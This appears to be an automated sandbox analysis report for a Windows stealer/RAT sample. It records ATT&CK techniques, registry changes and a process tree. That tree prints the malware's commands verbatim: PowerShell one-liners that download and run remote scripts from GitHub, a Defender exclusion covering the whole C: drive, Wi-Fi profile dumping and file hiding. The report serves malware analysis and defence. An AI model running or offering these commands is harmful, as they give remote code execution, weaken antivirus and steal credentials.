72774636c2f539cf4419d2ce078a81bacf6637fe5f54d866f326f2a7e6c61cad

Analysis

max time kernel
137s
max time network
107s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
18/08/2024, 17:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-08-18_a411850a05fd98df165fc049f0b65e7a_poet-rat_snatch.exe
Size

14.0MB
MD5

a411850a05fd98df165fc049f0b65e7a
SHA1

9761dd1b38dfab92aebe2278d760667e97c20526
SHA256

72774636c2f539cf4419d2ce078a81bacf6637fe5f54d866f326f2a7e6c61cad
SHA512

b8fb0c4a5b1607d0bdf652d4ebc628bbf7ed36ec04496c5a9d2a1e0b156e942ccd283805db4ba021e7f44a23e2691afbba434f1423a4b21886f2486334eb3eb7
SSDEEP

98304:LD34pnMJNfzN73viCc9Z39ifuGE9EdKvWRJVZgFjgw6IDsXBxYCspzHq21Ye5ucs:UMJNfpvWuQvIIQ/cqI6cp+hzMGhJXbT

Score

9^/10

credential_access discovery evasion execution persistence privilege_escalation ransomware spyware stealer

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 2 IoCs

flow	pid	Process
16	2820	powershell.exe
17	4196	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2820	powershell.exe
4196	powershell.exe
3480	powershell.exe
4424	PowerShell.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4520	netsh.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
15	raw.githubusercontent.com
16	raw.githubusercontent.com
17	raw.githubusercontent.com

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
1468	ARP.EXE

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Thunder_Kitty.jpg"	2024-08-18_a411850a05fd98df165fc049f0b65e7a_poet-rat_snatch.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3820	netsh.exe
1848	netsh.exe

System Network Connections Discovery 1 TTPs 1 IoCs

Attempt to get a listing of network connections.

discovery

System Network Connections Discovery

T1049

pid	Process
3212	NETSTAT.EXE

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
4428	ipconfig.exe
3212	NETSTAT.EXE
1448	ipconfig.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
4488	taskkill.exe

Modifies Control Panel 2 IoCs

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\Desktop\TileWallpaper = "0"	2024-08-18_a411850a05fd98df165fc049f0b65e7a_poet-rat_snatch.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\Desktop\WallpaperStyle = "2"	2024-08-18_a411850a05fd98df165fc049f0b65e7a_poet-rat_snatch.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-08-18_a411850a05fd98df165fc049f0b65e7a_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-08-18_a411850a05fd98df165fc049f0b65e7a_poet-rat_snatch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	2024-08-18_a411850a05fd98df165fc049f0b65e7a_poet-rat_snatch.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
2820	powershell.exe
3480	powershell.exe
2820	powershell.exe
4196	powershell.exe
4424	PowerShell.exe
4424	PowerShell.exe
3480	powershell.exe
4196	powershell.exe
4196	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2820	powershell.exe
Token: SeDebugPrivilege	3480	powershell.exe
Token: SeDebugPrivilege	4196	powershell.exe
Token: SeDebugPrivilege	4424	PowerShell.exe
Token: SeDebugPrivilege	4488	taskkill.exe
Token: SeIncreaseQuotaPrivilege	4196	powershell.exe
Token: SeSecurityPrivilege	4196	powershell.exe
Token: SeTakeOwnershipPrivilege	4196	powershell.exe
Token: SeLoadDriverPrivilege	4196	powershell.exe
Token: SeSystemProfilePrivilege	4196	powershell.exe
Token: SeSystemtimePrivilege	4196	powershell.exe
Token: SeProfSingleProcessPrivilege	4196	powershell.exe
Token: SeIncBasePriorityPrivilege	4196	powershell.exe
Token: SeCreatePagefilePrivilege	4196	powershell.exe
Token: SeBackupPrivilege	4196	powershell.exe
Token: SeRestorePrivilege	4196	powershell.exe
Token: SeShutdownPrivilege	4196	powershell.exe
Token: SeDebugPrivilege	4196	powershell.exe
Token: SeSystemEnvironmentPrivilege	4196	powershell.exe
Token: SeRemoteShutdownPrivilege	4196	powershell.exe
Token: SeUndockPrivilege	4196	powershell.exe
Token: SeManageVolumePrivilege	4196	powershell.exe
Token: 33	4196	powershell.exe
Token: 34	4196	powershell.exe
Token: 35	4196	powershell.exe
Token: 36	4196	powershell.exe
Token: SeIncreaseQuotaPrivilege	4196	powershell.exe
Token: SeSecurityPrivilege	4196	powershell.exe
Token: SeTakeOwnershipPrivilege	4196	powershell.exe
Token: SeLoadDriverPrivilege	4196	powershell.exe
Token: SeSystemProfilePrivilege	4196	powershell.exe
Token: SeSystemtimePrivilege	4196	powershell.exe
Token: SeProfSingleProcessPrivilege	4196	powershell.exe
Token: SeIncBasePriorityPrivilege	4196	powershell.exe
Token: SeCreatePagefilePrivilege	4196	powershell.exe
Token: SeBackupPrivilege	4196	powershell.exe
Token: SeRestorePrivilege	4196	powershell.exe
Token: SeShutdownPrivilege	4196	powershell.exe
Token: SeDebugPrivilege	4196	powershell.exe
Token: SeSystemEnvironmentPrivilege	4196	powershell.exe
Token: SeRemoteShutdownPrivilege	4196	powershell.exe
Token: SeUndockPrivilege	4196	powershell.exe
Token: SeManageVolumePrivilege	4196	powershell.exe
Token: 33	4196	powershell.exe
Token: 34	4196	powershell.exe
Token: 35	4196	powershell.exe
Token: 36	4196	powershell.exe
Token: SeIncreaseQuotaPrivilege	4196	powershell.exe
Token: SeSecurityPrivilege	4196	powershell.exe
Token: SeTakeOwnershipPrivilege	4196	powershell.exe
Token: SeLoadDriverPrivilege	4196	powershell.exe
Token: SeSystemProfilePrivilege	4196	powershell.exe
Token: SeSystemtimePrivilege	4196	powershell.exe
Token: SeProfSingleProcessPrivilege	4196	powershell.exe
Token: SeIncBasePriorityPrivilege	4196	powershell.exe
Token: SeCreatePagefilePrivilege	4196	powershell.exe
Token: SeBackupPrivilege	4196	powershell.exe
Token: SeRestorePrivilege	4196	powershell.exe
Token: SeShutdownPrivilege	4196	powershell.exe
Token: SeDebugPrivilege	4196	powershell.exe
Token: SeSystemEnvironmentPrivilege	4196	powershell.exe
Token: SeRemoteShutdownPrivilege	4196	powershell.exe
Token: SeUndockPrivilege	4196	powershell.exe
Token: SeManageVolumePrivilege	4196	powershell.exe

Suspicious use of WriteProcessMemory 54 IoCs

description	pid	Process	procid_target
PID 4440 wrote to memory of 4196	4440	2024-08-18_a411850a05fd98df165fc049f0b65e7a_poet-rat_snatch.exe	85
PID 4440 wrote to memory of 4196	4440	2024-08-18_a411850a05fd98df165fc049f0b65e7a_poet-rat_snatch.exe	85
PID 4440 wrote to memory of 3480	4440	2024-08-18_a411850a05fd98df165fc049f0b65e7a_poet-rat_snatch.exe	86
PID 4440 wrote to memory of 3480	4440	2024-08-18_a411850a05fd98df165fc049f0b65e7a_poet-rat_snatch.exe	86
PID 4440 wrote to memory of 2820	4440	2024-08-18_a411850a05fd98df165fc049f0b65e7a_poet-rat_snatch.exe	88
PID 4440 wrote to memory of 2820	4440	2024-08-18_a411850a05fd98df165fc049f0b65e7a_poet-rat_snatch.exe	88
PID 4440 wrote to memory of 4952	4440	2024-08-18_a411850a05fd98df165fc049f0b65e7a_poet-rat_snatch.exe	89
PID 4440 wrote to memory of 4952	4440	2024-08-18_a411850a05fd98df165fc049f0b65e7a_poet-rat_snatch.exe	89
PID 4440 wrote to memory of 4424	4440	2024-08-18_a411850a05fd98df165fc049f0b65e7a_poet-rat_snatch.exe	90
PID 4440 wrote to memory of 4424	4440	2024-08-18_a411850a05fd98df165fc049f0b65e7a_poet-rat_snatch.exe	90
PID 4440 wrote to memory of 4596	4440	2024-08-18_a411850a05fd98df165fc049f0b65e7a_poet-rat_snatch.exe	91
PID 4440 wrote to memory of 4596	4440	2024-08-18_a411850a05fd98df165fc049f0b65e7a_poet-rat_snatch.exe	91
PID 4440 wrote to memory of 860	4440	2024-08-18_a411850a05fd98df165fc049f0b65e7a_poet-rat_snatch.exe	92
PID 4440 wrote to memory of 860	4440	2024-08-18_a411850a05fd98df165fc049f0b65e7a_poet-rat_snatch.exe	92
PID 4196 wrote to memory of 4832	4196	powershell.exe	93
PID 4196 wrote to memory of 4832	4196	powershell.exe	93
PID 4440 wrote to memory of 4488	4440	2024-08-18_a411850a05fd98df165fc049f0b65e7a_poet-rat_snatch.exe	94
PID 4440 wrote to memory of 4488	4440	2024-08-18_a411850a05fd98df165fc049f0b65e7a_poet-rat_snatch.exe	94
PID 4832 wrote to memory of 4644	4832	csc.exe	95
PID 4832 wrote to memory of 4644	4832	csc.exe	95
PID 4196 wrote to memory of 3820	4196	powershell.exe	100
PID 4196 wrote to memory of 3820	4196	powershell.exe	100
PID 4196 wrote to memory of 2848	4196	powershell.exe	101
PID 4196 wrote to memory of 2848	4196	powershell.exe	101
PID 2848 wrote to memory of 2364	2848	net.exe	102
PID 2848 wrote to memory of 2364	2848	net.exe	102
PID 4196 wrote to memory of 4520	4196	powershell.exe	103
PID 4196 wrote to memory of 4520	4196	powershell.exe	103
PID 4196 wrote to memory of 1588	4196	powershell.exe	104
PID 4196 wrote to memory of 1588	4196	powershell.exe	104
PID 4196 wrote to memory of 3068	4196	powershell.exe	107
PID 4196 wrote to memory of 3068	4196	powershell.exe	107
PID 3068 wrote to memory of 636	3068	net.exe	108
PID 3068 wrote to memory of 636	3068	net.exe	108
PID 4196 wrote to memory of 4428	4196	powershell.exe	109
PID 4196 wrote to memory of 4428	4196	powershell.exe	109
PID 4196 wrote to memory of 2724	4196	powershell.exe	110
PID 4196 wrote to memory of 2724	4196	powershell.exe	110
PID 2724 wrote to memory of 2248	2724	net.exe	111
PID 2724 wrote to memory of 2248	2724	net.exe	111
PID 4196 wrote to memory of 1684	4196	powershell.exe	112
PID 4196 wrote to memory of 1684	4196	powershell.exe	112
PID 4196 wrote to memory of 3212	4196	powershell.exe	113
PID 4196 wrote to memory of 3212	4196	powershell.exe	113
PID 4196 wrote to memory of 4508	4196	powershell.exe	114
PID 4196 wrote to memory of 4508	4196	powershell.exe	114
PID 4196 wrote to memory of 1448	4196	powershell.exe	115
PID 4196 wrote to memory of 1448	4196	powershell.exe	115
PID 4196 wrote to memory of 1184	4196	powershell.exe	116
PID 4196 wrote to memory of 1184	4196	powershell.exe	116
PID 4196 wrote to memory of 1468	4196	powershell.exe	117
PID 4196 wrote to memory of 1468	4196	powershell.exe	117
PID 4196 wrote to memory of 1848	4196	powershell.exe	118
PID 4196 wrote to memory of 1848	4196	powershell.exe	118

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
860	attrib.exe

C:\Users\Admin\AppData\Local\Temp\2024-08-18_a411850a05fd98df165fc049f0b65e7a_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-08-18_a411850a05fd98df165fc049f0b65e7a_poet-rat_snatch.exe"
1⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:4440
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4196
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2m422dcj\2m422dcj.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4832
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5BCC.tmp" "c:\Users\Admin\AppData\Local\Temp\2m422dcj\CSC5A05D9AEF4164C45B33484D92E0128.TMP"
      4⤵
      PID:4644
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profiles
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3820
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup administrators
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2848
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators
      4⤵
      PID:2364
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:4520
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /all
    3⤵
    PID:1588
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" user
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3068
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user
      4⤵
      PID:636
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /displaydns
    3⤵
    - Gathers network information
    PID:4428
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2724
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup
      4⤵
      PID:2248
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
    3⤵
    PID:1684
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -ano
    3⤵
    - System Network Connections Discovery
    - Gathers network information
    PID:3212
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
    3⤵
    PID:4508
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /all
    3⤵
    - Gathers network information
    PID:1448
- - C:\Windows\system32\ROUTE.EXE
    "C:\Windows\system32\ROUTE.EXE" print
    3⤵
    PID:1184
- - C:\Windows\system32\ARP.EXE
    "C:\Windows\system32\ARP.EXE" -a
    3⤵
    - Network Service Discovery
    PID:1468
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profile
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1848
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -C "Add-MpPreference -ExclusionPath 'C:'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3480
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2820
- C:\Windows\system32\cmd.exe
  cmd /C �֫ }�n�$
  2⤵
  PID:4952
- C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
  PowerShell -Command ""
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4424
- C:\Windows\system32\cmd.exe
  cmd /C ��ݖ]� �ǫ
  2⤵
  PID:4596
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
  2⤵
  - Views/modifies file attributes
  PID:860
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM wallpaper32.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4488

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

System Network Connections Discovery

T1049

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
650530995c0c66b5742598af639576c6

SHA1
01ca36b91234e7dfe890d024bf027b7f0316f546

SHA256
d4854bdfe510248cbeb05959e5c65d609c3d32d017d83b14ad98fe318dc6f551

SHA512
32f4a48e19ee48505452798188b27d98a4da90b6771fa0514592f1efad46247cc8ee03b1e0dbe58440fd2c981c761e4bfcf9a110f232b801ccfcd657a8737841

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
